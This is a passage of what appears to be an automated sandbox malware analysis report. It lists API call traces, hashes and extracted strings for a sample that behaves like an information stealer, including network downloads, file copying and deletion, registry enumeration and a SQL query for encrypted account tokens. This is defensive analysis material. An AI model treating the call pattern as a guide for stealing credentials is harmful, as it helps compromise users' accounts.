                                              • Instruction Fuzzy Hash: EF3182BAD402086BDB10FBF0DC85EE9737DAB48704F40458EB31996081EE7897C9CB99
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,02BE95B0,00000000,?,00420E2C,00000000,?,00000000), ref: 00418130
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,02BE95B0,00000000,?,00420E2C,00000000,?,00000000,00000000), ref: 00418137
                                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00418158
                                              • __aulldiv.LIBCMT ref: 00418172
                                              • __aulldiv.LIBCMT ref: 00418180
                                              • wsprintfA.USER32 ref: 004181AC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                              • String ID: %d MB$@
                                              • API String ID: 2886426298-3474575989
                                              • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                              • Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
                                              • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                              • Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9
                                              APIs
                                                • Part of subcall function 047FAA07: lstrcpy.KERNEL32(?,00000000), ref: 047FAA4D
                                                • Part of subcall function 047E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 047E4A51
                                                • Part of subcall function 047E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 047E4A68
                                                • Part of subcall function 047E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 047E4A7F
                                                • Part of subcall function 047E4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 047E4AA0
                                                • Part of subcall function 047E4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 047E4AB0
                                              • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 047E6376
                                              • StrCmpCA.SHLWAPI(?,0064A480), ref: 047E63AE
                                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 047E63F6
                                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 047E641A
                                              • InternetReadFile.WININET(?,?,00000400,?), ref: 047E6443
                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 047E6471
                                              • CloseHandle.KERNEL32(?,?,00000400), ref: 047E64B0
                                              • InternetCloseHandle.WININET(?), ref: 047E64BA
                                              • InternetCloseHandle.WININET(00000000), ref: 047E64C7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                              • String ID:
                                              • API String ID: 4287319946-0
                                              • Opcode ID: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                              • Instruction ID: e2fd14b8585280650e8993d5e899d1e202d308bbc0fcc59cb8e316e053821406
                                              • Opcode Fuzzy Hash: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                              • Instruction Fuzzy Hash: 9F5161B5A40218ABEB20DF91CC48BEE7779AB58705F408198F605A72C0DB747B89CF95
                                              APIs
                                              • memset.MSVCRT ref: 047F4FEE
                                                • Part of subcall function 047F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 047F9072
                                              • lstrcat.KERNEL32(?,00000000), ref: 047F5017
                                              • lstrcat.KERNEL32(?,00421000), ref: 047F5034
                                                • Part of subcall function 047F4B77: wsprintfA.USER32 ref: 047F4B93
                                                • Part of subcall function 047F4B77: FindFirstFileA.KERNEL32(?,?), ref: 047F4BAA
                                              • memset.MSVCRT ref: 047F507A
                                              • lstrcat.KERNEL32(?,00000000), ref: 047F50A3
                                              • lstrcat.KERNEL32(?,00421020), ref: 047F50C0
                                                • Part of subcall function 047F4B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 047F4BD8
                                                • Part of subcall function 047F4B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 047F4BEE
                                                • Part of subcall function 047F4B77: FindNextFileA.KERNEL32(000000FF,?), ref: 047F4DE4
                                                • Part of subcall function 047F4B77: FindClose.KERNEL32(000000FF), ref: 047F4DF9
                                              • memset.MSVCRT ref: 047F5106
                                              • lstrcat.KERNEL32(?,00000000), ref: 047F512F
                                              • lstrcat.KERNEL32(?,00421038), ref: 047F514C
                                                • Part of subcall function 047F4B77: wsprintfA.USER32 ref: 047F4C17
                                                • Part of subcall function 047F4B77: StrCmpCA.SHLWAPI(?,004208D2), ref: 047F4C2C
                                                • Part of subcall function 047F4B77: wsprintfA.USER32 ref: 047F4C49
                                                • Part of subcall function 047F4B77: PathMatchSpecA.SHLWAPI(?,?), ref: 047F4C85
                                                • Part of subcall function 047F4B77: lstrcat.KERNEL32(?,0064A524), ref: 047F4CB1
                                                • Part of subcall function 047F4B77: lstrcat.KERNEL32(?,00420FF8), ref: 047F4CC3
                                                • Part of subcall function 047F4B77: lstrcat.KERNEL32(?,?), ref: 047F4CD7
                                                • Part of subcall function 047F4B77: lstrcat.KERNEL32(?,00420FFC), ref: 047F4CE9
                                                • Part of subcall function 047F4B77: lstrcat.KERNEL32(?,?), ref: 047F4CFD
                                                • Part of subcall function 047F4B77: CopyFileA.KERNEL32(?,?,00000001), ref: 047F4D13
                                                • Part of subcall function 047F4B77: DeleteFileA.KERNEL32(?), ref: 047F4D98
                                              • memset.MSVCRT ref: 047F5192
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                              • String ID:
                                              • API String ID: 4017274736-0
                                              • Opcode ID: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                              • Instruction ID: 6c9a55b7c2d3b9fe4f8a5c65fa8dcc94b2d53cc5accead6c747d77dd80282dd5
                                              • Opcode Fuzzy Hash: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                              • Instruction Fuzzy Hash: B441C679A4031467E714F7B0EC4AFED7738AB24705F804494B689662C0EEB867D88B92
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0064A360,00000000,?,00420E2C,00000000,?,00000000), ref: 047F8397
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 047F839E
                                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 047F83BF
                                              • __aulldiv.LIBCMT ref: 047F83D9
                                              • __aulldiv.LIBCMT ref: 047F83E7
                                              • wsprintfA.USER32 ref: 047F8413
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                              • String ID: @
                                              • API String ID: 2774356765-2766056989
                                              • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                              • Instruction ID: f8379c5954d3bd595b0f97152a2fb8d4be49f611394ebf363ec2f2dad90273e5
                                              • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                              • Instruction Fuzzy Hash: D12136B1E44218ABEB10DFD5CC49FAEBBB9FB44B14F104609F615BB280D77869048BA5
                                              APIs
                                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                              • lstrlenA.KERNEL32(00000000), ref: 0040BC9F
                                                • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BCCD
                                              • lstrlenA.KERNEL32(00000000), ref: 0040BDA5
                                              • lstrlenA.KERNEL32(00000000), ref: 0040BDB9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                              • API String ID: 1440504306-1079375795
                                              • Opcode ID: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
                                              • Instruction ID: 1db97c5984eaf975dbf010622291b68d8c4d82df198c84c91f10bdfb5a5a1c79
                                              • Opcode Fuzzy Hash: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
                                              • Instruction Fuzzy Hash: 8CB19671911108ABDB04FBA1DD52EEE7339AF14314F40452EF506B2091EF386E99CBBA
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess$DefaultLangUser
                                              • String ID: B
                                              • API String ID: 1494266314-2248957098
                                              • Opcode ID: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                              • Instruction ID: a53c6ee3ffce5caaac90cf9b44aa2343e9827e2133a721021c11305bfc7fe0eb
                                              • Opcode Fuzzy Hash: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                              • Instruction Fuzzy Hash: C2F03A38984209FFE3549FE0A90976C7B72FB06702F04019DF709862D0D6748A519B96
                                              APIs
                                              • memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                • Part of subcall function 00410A60: memset.MSVCRT ref: 00410C1C
                                                • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                                • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                                • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                                • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • memcmp.MSVCRT(?,v10,00000003), ref: 00409EAF
                                              • memset.MSVCRT ref: 00409EE8
                                              • LocalAlloc.KERNEL32(00000040,?), ref: 00409F41
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                              • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                              • API String ID: 1977917189-1096346117
                                              • Opcode ID: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                                              • Instruction ID: cfc602575c7eb8b90e75612a825b183f0a0020e5ceb1952e76b28d7f8d83ce04
                                              • Opcode Fuzzy Hash: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                                              • Instruction Fuzzy Hash: C9615F30A00248EBCB24EFA5DD96FED7775AF44304F408029F90A6F1D1DB786A56CB5A
                                              APIs
                                                • Part of subcall function 047E7537: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 047E75A1
                                                • Part of subcall function 047E7537: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 047E7618
                                                • Part of subcall function 047E7537: StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 047E7674
                                                • Part of subcall function 047E7537: GetProcessHeap.KERNEL32(00000000,?), ref: 047E76B9
                                                • Part of subcall function 047E7537: HeapFree.KERNEL32(00000000), ref: 047E76C0
                                              • lstrcat.KERNEL32(0064A668,004217FC), ref: 047E786D
                                              • lstrcat.KERNEL32(0064A668,00000000), ref: 047E78AF
                                              • lstrcat.KERNEL32(0064A668,00421800), ref: 047E78C1
                                              • lstrcat.KERNEL32(0064A668,00000000), ref: 047E78F6
                                              • lstrcat.KERNEL32(0064A668,00421804), ref: 047E7907
                                              • lstrcat.KERNEL32(0064A668,00000000), ref: 047E793A
                                              • lstrcat.KERNEL32(0064A668,00421808), ref: 047E7954
                                              • task.LIBCPMTD ref: 047E7962
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                              • String ID:
                                              • API String ID: 2677904052-0
                                              • Opcode ID: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                              • Instruction ID: 794c12cb0e1a1e835f9195ecc137f0640bc2b237b77368e9dbec75a71936ff4d
                                              • Opcode Fuzzy Hash: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                              • Instruction Fuzzy Hash: B9315075A40109EFDB08FBE1DC98DFE7776EB59305B105118E10667390DA34A942CB62
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404FCA
                                              • HeapAlloc.KERNEL32(00000000), ref: 00404FD1
                                              • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00404FEA
                                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405011
                                              • InternetReadFile.WININET(00415EDB,?,00000400,00000000), ref: 00405041
                                              • memcpy.MSVCRT(00000000,?,00000001), ref: 0040508A
                                              • InternetCloseHandle.WININET(00415EDB), ref: 004050B9
                                              • InternetCloseHandle.WININET(?), ref: 004050C6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
                                              • String ID:
                                              • API String ID: 3894370878-0
                                              • Opcode ID: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
                                              • Instruction ID: cb0899809939a0b3ab7ef321ba077ef70f04c27eec1e373fde9f1e9505320bf0
                                              • Opcode Fuzzy Hash: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
                                              • Instruction Fuzzy Hash: 2A3108B8A40218ABDB20CF94DC85BDDB7B5EB48704F1081E9F709B7281C7746AC58F99
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 047E5231
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 047E5238
                                              • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 047E5251
                                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 047E5278
                                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 047E52A8
                                              • memcpy.MSVCRT(00000000,?,00000001), ref: 047E52F1
                                              • InternetCloseHandle.WININET(?), ref: 047E5320
                                              • InternetCloseHandle.WININET(?), ref: 047E532D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                              • String ID:
                                              • API String ID: 1008454911-0
                                              • Opcode ID: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                              • Instruction ID: 5d7fdf8aa3d16f4b562e05f234d6a74c9888f37ada6e6ed2475b2cef9cc26a21
                                              • Opcode Fuzzy Hash: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                              • Instruction Fuzzy Hash: EB3108B4A40218EBDB20CF94DD88BDCB7B5EB48708F5081D9E709A7381D7706AC58F58
                                              APIs
                                                • Part of subcall function 047FAA87: lstrlen.KERNEL32(047E516C,?,?,047E516C,00420DDE), ref: 047FAA92
                                                • Part of subcall function 047FAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 047FAAEC
                                                • Part of subcall function 047FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 047FA9EF
                                              • StrCmpCA.SHLWAPI(00000000,004210C8,00000000), ref: 047F58AB
                                              • StrCmpCA.SHLWAPI(00000000,004210D0), ref: 047F5908
                                              • StrCmpCA.SHLWAPI(00000000,004210E0), ref: 047F5ABE
                                                • Part of subcall function 047FAA07: lstrcpy.KERNEL32(?,00000000), ref: 047FAA4D
                                                • Part of subcall function 047F5457: StrCmpCA.SHLWAPI(00000000,0042108C), ref: 047F548F
                                                • Part of subcall function 047FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 047FAB6C
                                                • Part of subcall function 047F5527: StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 047F557F
                                                • Part of subcall function 047F5527: lstrlen.KERNEL32(00000000), ref: 047F5596
                                                • Part of subcall function 047F5527: StrStrA.SHLWAPI(00000000,00000000), ref: 047F55CB
                                                • Part of subcall function 047F5527: lstrlen.KERNEL32(00000000), ref: 047F55EA
                                                • Part of subcall function 047F5527: strtok.MSVCRT(00000000,?), ref: 047F5605
                                                • Part of subcall function 047F5527: lstrlen.KERNEL32(00000000), ref: 047F5615
                                              • StrCmpCA.SHLWAPI(00000000,004210D8,00000000), ref: 047F59F2
                                              • StrCmpCA.SHLWAPI(00000000,004210E8,00000000), ref: 047F5BA7
                                              • StrCmpCA.SHLWAPI(00000000,004210F0), ref: 047F5C73
                                              • Sleep.KERNEL32(0000EA60), ref: 047F5C82
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpylstrlen$Sleepstrtok
                                              • String ID:
                                              • API String ID: 3630751533-0
                                              • Opcode ID: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                              • Instruction ID: 2ed2066e424d0622405d82ceaf9851f6580d94753d12c87105d626b737ea29a2
                                              • Opcode Fuzzy Hash: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                              • Instruction Fuzzy Hash: 0BE12F71910208ABEB18FBB0DD99DFE7379AF55204F40816CA64A66390EF347B4CCB91
                                              APIs
                                              • memset.MSVCRT ref: 047E158E
                                                • Part of subcall function 047E1507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 047E151B
                                                • Part of subcall function 047E1507: RtlAllocateHeap.NTDLL(00000000), ref: 047E1522
                                                • Part of subcall function 047E1507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 047E153E
                                                • Part of subcall function 047E1507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 047E155C
                                                • Part of subcall function 047E1507: RegCloseKey.ADVAPI32(?), ref: 047E1566
                                              • lstrcat.KERNEL32(?,00000000), ref: 047E15B6
                                              • lstrlen.KERNEL32(?), ref: 047E15C3
                                              • lstrcat.KERNEL32(?,004262DC), ref: 047E15DE
                                                • Part of subcall function 047FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 047FA9EF
                                                • Part of subcall function 047FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FAC,00420E17), ref: 047FAC2C
                                                • Part of subcall function 047FAC17: lstrcpy.KERNEL32(00000000), ref: 047FAC6B
                                                • Part of subcall function 047FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 047FAC79
                                                • Part of subcall function 047FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 047FAB6C
                                                • Part of subcall function 047F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,047E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FAC,00420E17), ref: 047F8DED
                                                • Part of subcall function 047FAB87: lstrcpy.KERNEL32(00000000,?), ref: 047FABD9
                                                • Part of subcall function 047FAB87: lstrcat.KERNEL32(00000000), ref: 047FABE9
                                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 047E16CC
                                                • Part of subcall function 047FAA07: lstrcpy.KERNEL32(?,00000000), ref: 047FAA4D
                                                • Part of subcall function 047E9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 047E9C53
                                                • Part of subcall function 047E9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 047E9C78
                                                • Part of subcall function 047E9C27: LocalAlloc.KERNEL32(00000040,?), ref: 047E9C98
                                                • Part of subcall function 047E9C27: ReadFile.KERNEL32(000000FF,?,00000000,047E16F6,00000000), ref: 047E9CC1
                                                • Part of subcall function 047E9C27: LocalFree.KERNEL32(047E16F6), ref: 047E9CF7
                                                • Part of subcall function 047E9C27: CloseHandle.KERNEL32(000000FF), ref: 047E9D01
                                              • DeleteFileA.KERNEL32(00000000), ref: 047E1756
                                              • memset.MSVCRT ref: 047E177D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                              • String ID:
                                              • API String ID: 3885987321-0
                                              • Opcode ID: 8fc6e7b969ebeb23bbd393a75bee3e620b8a4554d780bfd283efeaf09dab52ea
                                              • Instruction ID: 4a923ba75598421ca056d01b8758135e6c040ebf2feef6e5d96747ffcdf21725
                                              • Opcode Fuzzy Hash: 8fc6e7b969ebeb23bbd393a75bee3e620b8a4554d780bfd283efeaf09dab52ea
                                              • Instruction Fuzzy Hash: F65161B1D502189BDB29FB60DD99EED737CEF54204F4041E8A70E62280EE706B89CF95
                                              APIs
                                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                              • wsprintfA.USER32 ref: 00418459
                                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                              • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                                • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                              • RegQueryValueExA.ADVAPI32(00000000,02BE9388,00000000,000F003F,?,00000400), ref: 004184EC
                                              • lstrlenA.KERNEL32(?), ref: 00418501
                                              • RegQueryValueExA.ADVAPI32(00000000,02BE9370,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B34), ref: 00418599
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00418608
                                              • RegCloseKey.ADVAPI32(00000000), ref: 0041861A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                              • String ID: %s\%s
                                              • API String ID: 3896182533-4073750446
                                              • Opcode ID: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
